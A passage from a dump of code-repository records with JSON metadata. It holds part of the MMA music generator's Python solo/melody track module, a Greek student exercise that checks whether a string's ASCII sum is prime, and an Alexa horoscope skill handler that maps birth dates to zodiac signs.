assumes all drums are on channel 10\n self.voice = seqBump([MMA.pat.defaultDrum])\n \n def setVoicing(self, ln):\n \"\"\" Set the voicing option for a solo/melody track. 
Only permitted\n option is FOLLOWCHORD.\n \"\"\"\n\n notopt, ln = opt2pair(ln, toupper=True)\n\n if notopt:\n error(\"Voicing %s: Each option must be a OPT=VALUE pair.\" % self.name)\n\n for opt, val in ln:\n if opt == 'FOLLOWCHORD':\n if val in ('0', 'OFF'):\n val = None\n elif val in ('1', 'ON'):\n val = 1\n else:\n error(\"%s Voicing FollowChord: expecting On or Off.\" % self.name)\n self.followChord = val\n\n elif opt == 'FOLLOWKEY':\n if val in ('0', 'OFF'):\n val = None\n elif val in ('1', 'ON'):\n val = 1\n else:\n error(\"%s Voicing FollowKey: expecting On or Off.\" % self.name)\n\n self.followKey = val\n\n elif opt == 'ROOT':\n try:\n self.rootChord = MMA.chords.cdAdjust[val.upper()]\n except KeyError:\n error(\"Voicing %s: Chord name %s not valid.\" % (self.name, val))\n\n else:\n error(\"Voicing %s: Only valid options are 'FollowChord', 'FollowKey' and 'Root'.\"\n % self.name)\n\n def formatPattern(self, pat):\n \"\"\" Format an existing pattern. Overrides class def! \"\"\"\n\n if not pat:\n return ''\n else:\n return pat\n\n def saveGroove(self, gname):\n \"\"\" Save special/local variables for groove. \"\"\"\n\n PC.saveGroove(self, gname) # create storage. Do this 1st.\n self.grooves[gname]['FOLLOWCHORD'] = self.followChord\n self.grooves[gname]['FOLLOWKEY'] = self.followKey\n self.grooves[gname]['ROOT'] = self.rootChord\n self.grooves[gname]['TONES'] = self.toneList[:]\n\n def restoreGroove(self, gname):\n \"\"\" Restore special/local/variables for groove. \"\"\"\n\n self.followChord = self.grooves[gname]['FOLLOWCHORD']\n self.followKey = self.grooves[gname]['FOLLOWKEY']\n self.rootChord = self.grooves[gname]['ROOT']\n self.toneList = self.grooves[gname]['TONES']\n PC.restoreGroove(self, gname)\n\n def setSeqSize(self):\n \"\"\" Expand existing pattern list. \"\"\"\n\n self.toneList = seqBump(self.toneList)\n PC.setSeqSize(self)\n\n def clearSequence(self):\n \"\"\" Set some initial values. Called from init and clear seq. \"\"\"\n\n PC.clearSequence(self)\n self.toneList = seqBump([self.drumTone])\n\n def defPatRiff(self, ln):\n \"\"\" Create a solo pattern. This is used for solo sequenes only.\n\n All we do is to return the string set as a pattern. Pretty simple.\n\n \"\"\"\n\n return ln\n\n def setStretch(self, ln):\n \"\"\" Set a stretch (or compress) value for each note set in a solo. \"\"\"\n\n s = stof(ln[0])\n\n if s < 1 or s > 500:\n error(\"%s Stretch: value must be a percentage in range 1 to 500, not '%s'\"\n % (self.name, s))\n\n self.stretch = s / 100.\n\n def setArp(self, ln):\n \"\"\" Set the arpeggiate options. 
\"\"\"\n\n if len(ln)==1 and ln[0].upper()=='OFF':\n ln[0] = \"Rate=0\"\n \n notopt, ln = opt2pair(ln, 1)\n\n if notopt:\n error(\"%s Arpeggiate: expecting cmd=opt pairs, not '%s'.\"\n % (self.name, ' '.join(notopt)))\n\n for cmd, opt in ln:\n if cmd == 'RATE':\n if opt == '0' or opt == 'NONE':\n self.arpRate = 0\n else:\n self.arpRate = self.getNoteLen(opt)\n\n elif cmd == 'DECAY':\n v = stof(opt, \"Arpeggiate Decay must be a value, not '%s'\" % opt)\n if v < -50 or v > 50:\n error(\"%s Arpeggiate: Decay rate must be -50..+50\" %\n self.name)\n self.arpDecay = v / 100\n\n elif cmd == 'DIRECTION':\n valid = (\"UP\", \"DOWN\", \"BOTH\", \"RANDOM\")\n if opt not in valid:\n error(\"%s Arpeggiate Direction: Unknown setting '%s', use %s.\"\n % (self.name, opt, ', '.join(valid)))\n self.arpDirection = opt\n\n if MMA.debug.debug:\n dPrint(\"%s Arpeggiate: Rate=%s Decay=%s Direction=%s\" % \n (self.name, self.arpRate, self.arpDecay, self.arpDirection))\n\n def getNoteLen(self, n):\n \"\"\" This is a special interface to MMA.notelen.getNoteLen() which\n adjusts the length (in MIDI ticks) by the \"stetch\" value for\n this class.\n \"\"\"\n\n return MMA.notelen.getNoteLen(n) * self.stretch\n\n def restart(self):\n self.ssvoice = -1\n\n def setTone(self, ln):\n \"\"\" A solo track can have a tone, if it is DRUMTYPE.\"\"\"\n\n if not self.drumType:\n error(\"You must set a Solo track to DrumType before setting Tone\")\n\n if len(ln) > 1:\n error(\"Only 1 value permitted for Drum Tone in Solo tracks\")\n\n self.drumTone = MMA.translate.dtable.get(ln[0])\n\n def getChord(self, c, velocity, isdrum, isgrace):\n \"\"\" Extract a set of notes for a single beat.\n\n This is a function just to make getLine() a bit shorter\n and more readble.\n \"\"\"\n\n c = re.split(\"[, ]+\", c)\n\n if not c:\n error(\"You must specify the first note in a solo line\")\n\n \"\"\" Convert the note part into a series of midi values\n Notes can be a single note, or a series of notes. And\n each note can be a letter a-g (or r), a '#,&,n' plus\n a series of '+'s or '-'s. Drum solos must have each\n note separated by ' ' or ','s: \"Snare1,KickDrum1,44\".\n\n Each chunk could be:\n - a midi value (44)\n - a drum note ( KickDrum1)\n - a single note (g#) (g&-)\n - Or groups with spaces/commas (f 100) (44 , KickDrum) (a,b c)\n \"\"\"\n\n events = [] # array for each note event\n\n for cc in c:\n if not cc or not cc[0]:\n continue\n if '/' in cc:\n if cc.count('/') > 1:\n error(\"%s: Only 1 '/velocity' permitted. 
You can separate \"\n \"notes in the chord with ',' or ' ' and it'll work.\" %\n self.name)\n cc, newvel = cc.split('/')\n if not newvel:\n error(\"%s: expecting 'volume' after '/'\" % self.name)\n\n if not cc:\n error(\"%s: Volume '/' must immediately follow note.\" % self.name)\n\n thisvel = stoi(newvel)\n\n if thisvel < 0 or thisvel > 127:\n error(\"%s: Velocity must be 0..127, not '%s'.\" % (self.name, newvel))\n else:\n thisvel = velocity\n\n if cc[0] == 'r':\n if isgrace:\n warning(\"%s: Grace note is a rest (ignored).\" % self.name)\n\n if events or len(cc) > 1:\n error(\"%s: Rests and notes cannot be combined.\" % self.name)\n else:\n events.append(NoteEvent(None, 0, isgrace)) # note event with no pitch\n\n elif cc[0] in \"1234567890\":\n n = stoi(cc, \"%s: Note values must be integer or literal.\" %\n self.name)\n if n < 0 or n > 127:\n error(\"%s: Midi notes must be 0..127, not '%s'\" %\n (self.name, n))\n\n # if using value we fake-adjust octave,\n # it (and transpose) is set later.\n\n if not isdrum:\n n -= self.octave[self.seq]\n\n events.append(NoteEvent(n, thisvel, isgrace))\n\n elif isdrum: # drum must be a value, * or drum-name\n if cc == '*':\n events.append(NoteEvent(self.drumTone, thisvel, isgrace))\n else:\n events.append(NoteEvent(int(MMA.translate.dtable.get(cc)), thisvel, isgrace))\n\n else: # must be a note(s) in std. notation\n cc = list(cc)\n while cc:\n name = cc.pop(0)\n\n if not name in self.midiNotes:\n error(\"%s: Encountered illegal note name '%s'\"\n % (self.name, name))\n\n n = self.midiNotes[name] # name is string, n is value\n\n # Parse out a \"#', '&' or 'n' accidental.\n\n if cc and cc[0] in accValues:\n i = cc.pop(0)\n self.acc[name] = accValues[i]\n\n n += self.acc[name] # accidental adjust (from above or keysig)\n\n # Parse out +/- (or series) for octave\n\n while cc and cc[0] in '+-':\n a = cc.pop(0)\n if a == '+':\n n += 12\n else:\n n -= 12\n\n events.append(NoteEvent(n, thisvel, isgrace))\n\n return events\n\n def getLine(self, pat):\n \"\"\" Extract a melodyline for solo/melody tracks.\n\n This is only called from trackbar(), but it's nicer\n to isolate it here.\n\n\n RETURNS: notes structure. This is a dictionary. Each key represents\n an offset in MIDI ticks in the current bar. The data for\n each entry is an array of note events:\n\n notes[offset] - [nev [,...] ] See top of file for noteEvent()\n class which sets the fields.\n \"\"\"\n\n sc = self.seq\n\n \"\"\" Get a COPY of the keysignature note table (a dict).\n As a bar is processed the table is updated. There is one difference\n here---in real music an accidental for a note in a given octave does\n not effect the following same-named notes in different octaves.\n In this routine IT DOES.\n\n FollowKey=Off is usually (user) set when using a sequence pattern.\n \"\"\"\n\n if self.followKey: # this is the default\n self.acc = keySig.accList.copy()\n else: # disable the feature. Useful for sequence patterns!\n self.acc = {'a': 0, 'c': 0, 'b': 0, 'e': 0, 'd': 0, 'g': 0, 'f': 0}\n\n # list of notename to midivalues\n\n self.midiNotes = {'c': 0, 'd': 2, 'e': 4, 'f': 5, 'g': 7, 'a': 9, 'b': 11, 'r': None}\n\n \"\"\" The initial string is in the format \"1ab;4c;;4r;\". The trailing\n ';' is important and needed. If we don't have this requirement\n we can't tell if the last note is a repeat of the previous. For\n example, if we have coded \"2a;2a;\" as \"2a;;\" and we didn't\n have the 'must end with ;' rule, we end up with \"2a;\" and\n then we make this into 2 notes...or do we? 
Easiest just to\n insist that all bars end with a \";\".\n \"\"\"\n\n if not pat.endswith(';'):\n error(\"All Solo strings must end with a ';'\")\n\n # Get the end of the bar in ticks. If we're doing a truncate\n # use the temporary bar length, otherwise figure it out.\n\n if MMA.truncate.length:\n barEnd = MMA.truncate.length\n else:\n barEnd = gbl.barLen\n\n duration = self.getNoteLen('4') # default note length\n velocity = defaultVelocity # intial/default velocity for solo notes\n articulation = 1 # additional articulation for solo notes\n\n notes = {} # NoteEvent list, keys == offset\n\n if self.drumType:\n isdrum = 1\n lastc = str(self.drumTone)\n else:\n isdrum = None\n lastc = '' # last parsed note\n\n # convert pat to a list\n pat = [x.strip() for x in pat.split(';')[:-1]]\n\n # set initial offset into bar. This compensates for the previous\n # bar ending in a ~ and this one starting with ~.\n # This special case bumps the initial bar offset\n\n if pat[0].startswith(\"~\"):\n if not self.endTilde or self.endTilde[1] != gbl.tickOffset:\n error(\"Previous line did not end with '~'\")\n else:\n pat[0] = pat[0][1:].strip()\n offset = self.endTilde[0]\n else:\n offset = 0\n\n lastOffset = None\n\n # Strip off trailing ~. This permits long notes to end past the\n # current barend. Note, flag set for the next bar to test for\n # a leading ~.\n\n if pat[-1].endswith(\"~\"):\n self.endTilde = [1, gbl.tickOffset + barEnd]\n pat[-1] = pat[-1][:-1].strip()\n else:\n self.endTilde = []\n\n ##################################################\n # Now we can parse each chunk of the solo string.\n\n for a in pat:\n \"\"\" If we find a \"<>\" we just ignore that. It's useful when\n multiple continuation bars are needed with ~.\n \"\"\"\n\n accentVol = None\n accentDur = None\n isgrace = False\n\n if a == '<>':\n continue\n\n \"\"\" Next, strip out all '' settings.\n\n VOLUME: If no option is set, we assume VOLUME. The default\n velocity setting was set before the loop (==90) and is\n changed here for the duration of the current bar/riff.\n The set velocity will still be modified by the global\n and track volume adjustments.\n\n DURATION: Duration or articulation setting is defaulted to 100.\n Changing it here will do so for the duration of the\n bar/riff. Note, the track ARTICULATION is still applied.\n\n ISGRACE: grace note indication and offset. Offset is optional.\n\n OFFSET: change the current offset into the bar. 
Can be negative\n which forces overlapping notes.\n\n \"\"\"\n\n a, vls = pextract(a, \"<\", \">\")\n\n if vls:\n if len(vls) > 1:\n error(\"Only 1 is permitted per note-set\")\n\n vls = vls[0].split(',')\n for vv in vls:\n\n vv = vv.upper().strip()\n\n # We have an default offset for grace notes of 2.\n # So, if what have a GRACE without a offset, convert\n # the command to that.\n if vv == 'GRACE':\n vv = 'GRACE=2'\n\n if not '=' in vv:\n vv = \"VOLUME=\" + vv\n\n vc, vo = vv.split('=', 1) # note: it's already uppercase!\n\n if vc == 'VOLUME':\n if vo in MMA.volume.vols: # arg was a volume 'FF, 'mp', etc.\n velocity = defaultVelocity * MMA.volume.vols[vo]\n else:\n error(\"%s: No volume '%s'.\" % (self.name, vo))\n\n elif vc == 'GRACE':\n isgrace = stof(vo, \"%s: Expecting a value, not %s.\" % (self.name, vo))\n if isgrace <= 0:\n error(\"%s: Offset modifier must be greater than 0.\"\n % self.name)\n\n elif vc == 'OFFSET':\n offset = stoi(vo, \"%s: Offset expecting integer, not %s.\"\n % (self.name, vo))\n\n if offset < 0:\n error(\"%s: Offset must be positive.\" % self.name)\n\n if offset >= barEnd:\n error(\"%s: Offset has been set past the end of the bar.\"\n % self.name)\n\n elif vc == 'ARTICULATE':\n articulation = stoi(vo, \"%s: Articulation expecting integer,\"\n \" not %s.\" % (self.name, vo))\n\n if articulation < 1 or articulation > 200:\n error(\"%s: Articulation must be 1..200, not %s.\" %\n (self.name, vo))\n articulation /= 100.\n\n else:\n error(\"%s: Unknown command '%s'.\" % (self.name, vv))\n\n if offset >= barEnd:\n error(\"Attempt to start Solo note '%s' after end of bar\" % a)\n\n \"\"\" Split the chord chunk into a note length and notes. Each\n part of this is optional and defaults to the previously\n parsed value.\n \"\"\"\n\n i = 0\n while i < len(a):\n if not a[i] in '1234567890.+-tT:':\n break\n else:\n i += 1\n\n if i:\n duration = self.getNoteLen(a[0:i].replace(' ', ''))\n a = a[i:].strip()\n\n # next item might be an accent string.\n\n i = 0\n while i < len(a):\n if not a[i] in \"!-_^&\":\n break\n else:\n i += 1\n\n if i:\n c = a[0:i]\n accentVol = 1\n accentDur = 1\n\n accentDur -= c.count('!') * .2\n accentDur += c.count('-') * .2\n accentDur += c.count('_') * .2\n accentVol += c.count('^') * .2\n accentVol -= c.count('&') * .2\n\n if accentDur < .1:\n accentDur = .1\n if accentDur > 2:\n accentDur = 2\n if accentVol < .1:\n accentVol = .1\n if accentVol > 2:\n accentVol = 2\n a = a[i:]\n\n # Now we get to look at pitches.\n\n if not a or a == '' or a == ' ':\n a = lastc\n evts = self.getChord(a, velocity, isdrum, isgrace) # get chord\n\n if not evts:\n error(\"No pitches specifed for notes.\")\n\n for e in evts:\n e.velocity = self.adjustVolume(e.defvelocity, offset)\n if accentVol:\n e.velocity *= accentVol\n e.duration = duration\n\n if accentDur:\n e.articulation = articulation * accentDur\n else:\n e.articulation = articulation\n\n lastc = a # save last chord for next loop\n\n # add note event(s) to note{}\n if not offset in notes:\n notes[offset] = []\n notes[offset].extend(evts)\n\n lastOffset = offset\n\n if not e.isgrace:\n offset += duration\n\n if offset <= barEnd:\n if self.endTilde:\n error(\"Tilde at end of bar has no effect\")\n\n else:\n if self.endTilde:\n self.endTilde[0] = offset - barEnd\n else:\n warning(\"%s, end of last note overlaps end of bar by %g \"\n \"beat(s).\" % (self.name, (offset - barEnd) / float(gbl.BperQ)))\n\n if MMA.swing.mode:\n notes = MMA.swing.swingSolo(notes)\n\n \n return notes\n\n def followAdjust(self, notes, 
ctable):\n \"\"\" Convert pitches to reflect current chord. \"\"\"\n\n sc = self.seq\n\n for offset in notes:\n nn = notes[offset]\n\n if len(nn) == 1 and nn[0].pitch is not None:\n tb = self.getChordInPos(offset, ctable)\n\n if tb.chordZ:\n continue\n\n nn[0].pitch += (tb.chord.rootNote + self.rootChord)\n\n return notes\n\n def addHarmony(self, notes, ctable):\n \"\"\" Add harmony to solo notes. We need to be careful\n since the chords can contain grace and NULL notes.\n \"\"\"\n\n sc = self.seq\n\n harmony = self.harmony[sc]\n harmOnly = self.harmonyOnly[sc]\n\n for offset in notes:\n nn = notes[offset]\n\n pitch = None\n count = 0\n for n in nn:\n if n.isgrace or n.pitch is None:\n continue\n pitch = n.pitch\n duration = n.duration\n articulation = n.articulation\n velocity = n.defvelocity\n count += 1 # signals multiple notes, don't harmonize\n\n if harmOnly:\n n.pitch = None\n\n # The chord might have no notes, have more than one, or be all grace\n if pitch is None or count != 1:\n continue\n\n tb = self.getChordInPos(offset, ctable)\n\n if tb.chordZ:\n continue\n\n h = MMA.harmony.harmonize(harmony, pitch, tb.chord.bnoteList)\n\n for n in h:\n e = NoteEvent(n,\n self.adjustVolume(velocity * self.harmonyVolume[sc], offset),\n False)\n e.duration = duration\n e.articulation = articulation\n nn.append(e)\n\n def trackBar(self, pat, ctable):\n \"\"\" Do the solo/melody line. Called from self.bar() \"\"\"\n\n sc = self.seq\n\n notes = self.getLine(pat)\n\n # adjust all the notes for the given chord if we are in \"FOLLOW CHORD\" mode.\n\n if self.followChord and not self.drumType:\n notes = self.followAdjust(notes, ctable)\n\n if self.harmony[sc] and not self.drumType:\n self.addHarmony(notes, ctable)\n\n unify = self.unify[sc]\n\n rptr = self.mallet\n\n for offset in sorted(notes.keys()):\n nn = notes[offset]\n \n # the \"None\" test is important. Arp doesn't like rests.\n if self.arpRate and nn[0].pitch is not None:\n self.trackArp(nn, offset)\n continue\n\n # For each chord we process 2x. First time finds all the grace\n # notes and sends them to the midi machine; 2nd time normal notes.\n # Has to be done this was so we don't force grace note adjustments\n # (durations) onto normal notes. Grace notes ignore strum!\n\n # grace\n for nev in nn:\n n = nev.pitch\n if n is None or not nev.isgrace: # skip rests and non-grace\n continue\n\n if not self.drumType: # no octave/transpose for drums\n n = self.adjustNote(n)\n\n # Note that each grace note has it's own offset and duration\n self.sendNote(int(offset - (nev.duration // nev.isgrace)),\n self.getDur(int(nev.duration * nev.articulation)),\n n, int(nev.velocity))\n\n # normal notes.\n\n strumAdjust = self.getStrum(sc)\n strumAdd = self.strumAdd[sc]\n strumOffset = 0\n\n dur = None # default duration for notes in chord\n\n for nev in nn:\n n = nev.pitch\n if n is None or nev.isgrace: # skip rests and grace\n continue\n\n if not self.drumType: # no octave/transpose for drums\n n = self.adjustNote(n)\n\n off = offset + strumOffset\n \n # Set duration for this chord. Only do it once so they are\n # all the same length. The call to getDur() adjusts for RDURATION.\n if dur is None:\n dur = self.getDur(int(nev.duration * nev.articulation))\n\n self.sendNote(off, dur, n, int(nev.velocity))\n\n strumAdjust += strumAdd\n strumOffset += strumAdjust\n\n def trackArp(self, nn, offset):\n \"\"\" Special trackbar() for arpeggiator. \"\"\"\n\n if self.drumType:\n error(\"%s Arpeggiate: Incompatible with DRUMTYPE. 
Try MALLET?\" % self.name)\n\n notes = [[self.adjustNote(x.pitch), x.velocity] for x in nn]\n notes.sort()\n\n random = self.direction == 'RANDOM'\n\n if self.arpDirection == \"DOWN\":\n notes.reverse()\n\n elif self.arpDirection == \"BOTH\":\n z = notes[:]\n z.reverse()\n notes.extend(z[1:-1])\n\n duration = self.arpRate # duration of each note\n count = nn[0].duration // duration # total number to play\n if count < 1:\n count = 1\n\n while 1:\n nn = range(len(notes))\n if random:\n random.randomize(nn)\n for i in nn:\n n = notes[i]\n\n self.sendNote(offset,\n self.getDur(duration), n[0],\n self.adjustVolume(n[1], offset))\n count -= 1\n if not count:\n break\n\n offset += duration\n\n if self.arpDecay:\n n[1] = int(n[1] + (n[1] * self.arpDecay))\n if n[1] < 1:\n n[1] = 1\n if n[1] > 127:\n n[1] = 127\n\n if not count:\n break\n\n\nclass Solo(Melody):\n \"\"\" Pattern class for a solo track. \"\"\"\n\n vtype = 'SOLO'\n\n # Grooves are not saved/restored for solo tracks.\n\n def restoreGroove(self, gname):\n self.setSeqSize()\n\n def saveGroove(self, gname):\n pass\n\n def forceRestoreGroove(self, gname):\n PC.restoreGroove(self, gname)\n\n def forceSaveGroove(self, gname):\n PC.saveGroove(self, gname)\n\n#######################\n\n\"\"\" When solos are included in a chord/data line they are\n assigned to the tracks listed in this list. Users can\n change the tracks with the setAutoSolo command.\n\"\"\"\n\nautoSoloTracks = ['SOLO', 'SOLO-1', 'SOLO-2', 'SOLO-3']\n\n\ndef setAutoSolo(ln):\n \"\"\" Set the order and names of tracks to use when assigning\n automatic solos (specified on chord lines in {}s).\n \"\"\"\n\n global autoSoloTracks\n\n if not len(ln):\n error(\"You must specify at least one track for autosolos\")\n\n autoSoloTracks = []\n for n in ln:\n n = n.upper()\n MMA.alloc.trackAlloc(n, 1)\n if gbl.tnames[n].vtype not in ('MELODY', 'SOLO'):\n error(\"All autotracks must be Melody or Solo tracks, not %s\"\n % gbl.tnames[n].vtype)\n\n autoSoloTracks.append(n)\n\n if MMA.debug.debug:\n dPrint(\"AutoSolo track names: %s\" % ' '.join([a for a in autoSoloTracks]))\n\n\n###############\n\ndef extractSolo(ln, rptcount):\n \"\"\" Parser calls this to extract solo strings. \"\"\"\n\n a = ln.count('{')\n b = ln.count('}')\n\n if a != b:\n error(\"Mismatched {}s for solo found in chord line\")\n\n if a:\n if rptcount > 1:\n error(\"Bars with both repeat count and solos are not permitted\")\n\n ln, solo = pextract(ln, '{', '}')\n\n if len(solo) > len(autoSoloTracks):\n error(\"Too many melody/solo riffs in chord line. %s used, \"\n \"only %s defined\" % (len(solo), len(autoSoloTracks)))\n\n firstSolo = solo[0][:] # save for autoharmony tracks\n\n \"\"\" We have the solo information. Now we loop though each \"solo\" and:\n 1. Ensure or Create a MMA track for the solo\n 2. Push the solo data into a Riff for the given track.\n \"\"\"\n\n for s, trk in zip(solo, autoSoloTracks):\n if not s:\n continue # skip placeholder/empty tracks\n MMA.alloc.trackAlloc(trk, 1)\n t = gbl.tnames[trk]\n if t.riff:\n error(\"%s: Attempt to add {} solo when the track \"\n \"has pending RIFF data.\" % t.name)\n t.setRiff(s.strip())\n\n \"\"\" After all the solo data is interpreted and sent to the\n correct track, we check any leftover tracks. If any of these\n tracks are empty of data AND are harmonyonly the note\n data from the first track is interpeted again for that\n track. 
Tricky: the max() is needed since harmonyonly can\n have different setting for each bar...this way\n the copy is done if ANY bar in the seq has harmonyonly set.\n \"\"\"\n\n for t in autoSoloTracks[1:]:\n if t in gbl.tnames and not gbl.tnames[t].riff \\\n and set(gbl.tnames[t].harmonyOnly) != {None}:\n gbl.tnames[t].setRiff(firstSolo[:])\n\n if MMA.debug.debug:\n dPrint(\"%s duplicated to %s for HarmonyOnly.\" % (trk, t))\n\n return ln\n","repo_name":"infojunkie/mma","sub_path":"MMA/patSolo.py","file_name":"patSolo.py","file_ext":"py","file_size_in_byte":31545,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"33978419612","text":"# Άσκηση 4:\r\n# Γράψτε μια συνάρτηση η οποία μετατρέπει ένα string σε αριθμό \r\n# σύμφωνα με την αναπαράσταση των αριθμών σε ASCII code και \r\n# μετά ελέγχει αν ο αριθμός είναι πρώτος. Για τον έλεγχο αν ένας \r\n# αριθμός είναι πρώτος ΔΕΝ μπορείτε να χρησιμοποιήσετε εξωτερική βιβλιοθήκη.\r\n# Βήματα:\r\n# 1)Για κάθε γράμμα που δινει ο χρήστης το σπάω σε χαρακτήρες και ταυτόχρονα βάζω \r\n# σε λίστα numbersFromWords[] το ascii αριθμό του με την ord(letters)\r\n# 2)Για κάθε αριθμό στην λίστα μου τον προσθέτω σε μία μεταβλητή Sum οπου κρατάω το σύνολο\r\n# 3)Για να είναι ένας αριθμός πρώτος πρεπει να διαιρείτε με τον αυτό του και το 1 μόνο\r\n# 4)Το ελέγχω και εκτυπώνω ανάλογο μύνημα\r\n\r\n\r\nword = input()\r\n\r\nnumbersFromWords = []\r\nlist(word)\r\nsum = 0\r\n#pairnw kathe gramma kai to kanw arithmo\r\n\r\nfor letter in word:\r\n numbersFromWords.append(ord(letter))\r\n\r\nfor number in numbersFromWords:\r\n sum += number\r\n\r\n#to / gyrnaei float opote // gia na gyrisei int\r\nfor i in range (2, sum//2):\r\n if (sum % i) == 0:\r\n print(sum, \"is not prime\")\r\n break\r\n else:\r\n print(sum, \"is a prime number\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"tsatsaris/PythonScriptsJanuary2020","sub_path":"Αskhsh4.py","file_name":"Αskhsh4.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37341672740","text":"from __future__ import print_function\n\nimport random\n# ------------------------------------------------------------------------------\n# ---------------------------- Main Handler ------------------------------------\n# ------------------------------------------------------------------------------\n\ndef lambda_handler(event, context):\n \"\"\" \n This is the Main Handler function that will call other functions.\n We get two inputs : event , context\n \"\"\"\n \n if event['request']['type'] == \"LaunchRequest\":\n return onLaunch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return onIntent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return onSessionEnd(event['request'], event['session'])\n \n# ------------------------------------------------------------------------------\n# ----------------------------- Event Handlers ---------------------------------\n# ------------------------------------------------------------------------------\n\ndef onLaunch(launchRequest, session):\n \"\"\"\n This function welcomes the user , if the person does not Know how to \n interact with the Skill \n \"\"\"\n \n return welcomeGuest()\n \n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + 
session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\ndef onIntent(intentRequest, session):\n \n intent = intentRequest['intent']\n intentName = intentRequest['intent']['name']\n\n if intentName == \"WhatIsMyZodiac\":\n return set_zodiac(intent, session)\n elif intentName ==\"ZodiacInformation\":\n return zodiac_information(intent,session)\n elif intentName == \"AMAZON.HelpIntent\":\n return welcomeGuest()\n elif intentName == \"AMAZON.CancelIntent\" or intentName == \"AMAZON.StopIntent\":\n return handleSessionEndRequest()\n else:\n raise ValueError(\"Invalid intent\")\n \n\ndef onSessionEnd(sessionEndedRequest, session):\n \"\"\" \n Called when the user ends the session.\n \"\"\"\n print(\"on_session_ended requestId=\" + sessionEndedRequest['requestId'] + \", sessionId=\" + session['sessionId'])\n \n \n# ------------------------------------------------------------------------------\n# --------------------------- Behaviour Handlers -------------------------------\n# ------------------------------------------------------------------------------\n\ndef welcomeGuest():\n \"\"\"\n Giving Welcome Instructions to User\n \"\"\"\n \n sessionAttributes = {}\n cardTitle = \"Welcome Information\"\n speechOutput = \"Welcome to Horoscope 3.1, \" \\\n \"tell me your date of birth, \" \\\n \"for example: three december. \"\n repromptText = \"tell me your date of birth, \" \\\n \"for example: three december. \"\n shouldEndSession = False\n \n return buildResponse(sessionAttributes, buildSpeechletResponse(cardTitle, speechOutput, repromptText, shouldEndSession))\n\n\ndef create_zodiac_attributes(Zodiac):\n return {\"zodiac\": Zodiac}\n\n\n\ndef set_zodiac(intent, session):\n \"\"\" Sets the zodiac of the person and prepares the speech to reply the same to the\n user.\n \"\"\"\n\n \n card_title = \"Zodiac Sign\"\n session_attributes = {}\n should_end_session = False\n\n Zodiac=\"\"\n \n if 'month' in intent['slots']: \n if 'date' in intent['slots'] and intent['slots']['date']['value'].isnumeric():\n birth_month=intent['slots']['month']['value'].lower()\n birth_day=int(intent['slots']['date']['value'])\n \n if (birth_day>=20 and birth_month==\"january\" and birth_day<=31) or (birth_day>=1 and birth_day<=18 and birth_month==\"february\"): \n Zodiac=\"Aquarius\"\n \n elif (birth_day>=19 and birth_month==\"february\"and birth_day<=29) or (birth_day>=1 and birth_day<=20 and birth_month==\"march\"):\n Zodiac=\"Pisces\"\n \n elif (birth_day>=21 and birth_month==\"march\" and birth_day<=31) or (birth_day>=1 and birth_day<=19 and birth_month==\"april\"):\n Zodiac=\"Aries\"\n \n elif (birth_day>=20 and birth_month==\"april\" and birth_day<=30) or (birth_day>=1 and birth_day<=20 and birth_month==\"may\"):\n Zodiac=\"Taurus\"\n \n elif (birth_day>=21 and birth_month==\"may\" and birth_day<=31) or (birth_day>=1 and birth_day<=20 and birth_month==\"june\"):\n Zodiac=\"Gemini\"\n \n elif (birth_day>=21 and birth_month==\"june\" and birth_day<=30) or (birth_day>=1 and birth_day<=22 and birth_month==\"july\"):\n Zodiac=\"Cancer\"\n \n elif (birth_day>=23 and birth_month==\"july\" and birth_day<=31) or (birth_day>=1 and birth_day<=22 and birth_month==\"august\"):\n Zodiac=\"Leo\"\n \n elif (birth_day>=23 and birth_month==\"august\" and birth_day<=31) or (birth_day>=1 and birth_day<=22 and birth_month==\"september\"):\n Zodiac=\"Virgo\"\n \n elif (birth_day>=23 and birth_month==\"september\" and birth_day<=30) or (birth_day>=1 and birth_day<=22 and birth_month==\"october\"):\n 
Zodiac=\"Libra\"\n \n elif (birth_day>=23 and birth_month==\"october\" and birth_day<=31) or (birth_day>=1 and birth_day<=21 and birth_month==\"november\"):\n Zodiac=\"Scorpio\"\n \n elif (birth_day>=22 and birth_month==\"november\" and birth_day<=30) or (birth_day>=1 and birth_day<=21 and birth_month==\"december\"):\n Zodiac=\"Sagittarius\"\n \n elif (birth_day>=22 and birth_month==\"december\" and birth_day<=31) or (birth_day>=1 and birth_day<=19 and birth_month==\"january\"):\n Zodiac=\"Capricorn\"\n \n if(len(Zodiac)>1):\n session_attributes = create_zodiac_attributes(Zodiac)\n speech_output = \"Your zodiac sign is \" + \\\n Zodiac+ \\\n \". You can ask me information about yourself by saying, \" \\\n \"describe me\"\n reprompt_text = \"You can ask me information about yourself by saying, \" \\\n \"describe me\"\n else:\n speech_output = \"Sorry, i can't tell your zodiac sign because you provided invalid details. \" \\\n \"Please try again. \"\\\n \"Tell me your date of birth, \" \\\n \"for example: three december. \"\n reprompt_text = \"Tell me your date of birth, \" \\\n \"for example: three december. \"\n return buildResponse(session_attributes, buildSpeechletResponse(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef zodiac_information(intent, session):\n \"\"\" \n Provides some funny and ineteresting facts about person.\n \"\"\"\n cardTitle = \"Interesting Information\"\n sessionAttributes = {}\n if session.get('attributes', {}) and \"zodiac\" in session.get('attributes', {}):\n Zodiac = session['attributes']['zodiac']\n zodiac_info=Information[Zodiac]\n speechOutput = zodiac_info+\" That's all. Thank you for trying Horoscope 3.1, please take a moment to rate and review the skill, have a nice day!!\"\n repromptText=None\n shouldEndSession = True\n\n else:\n speechOutput =\"I can't describe you until you tell me your date of birth. \" \\\n \"First, \"\\\n \"tell me your date of birth, \" \\\n \"for example: three december. \"\n\n repromptText = \"Tell me your date of birth \" \\\n \"for example: three december. \"\n shouldEndSession = False\n return buildResponse(sessionAttributes, buildSpeechletResponse(cardTitle, speechOutput, repromptText, shouldEndSession))\n\n\ndef handleSessionEndRequest():\n cardTitle = \"Session Ended\"\n speechOutput = \"Thank you for trying horoscope 3.1 \" \\\n \"Have a nice day! 
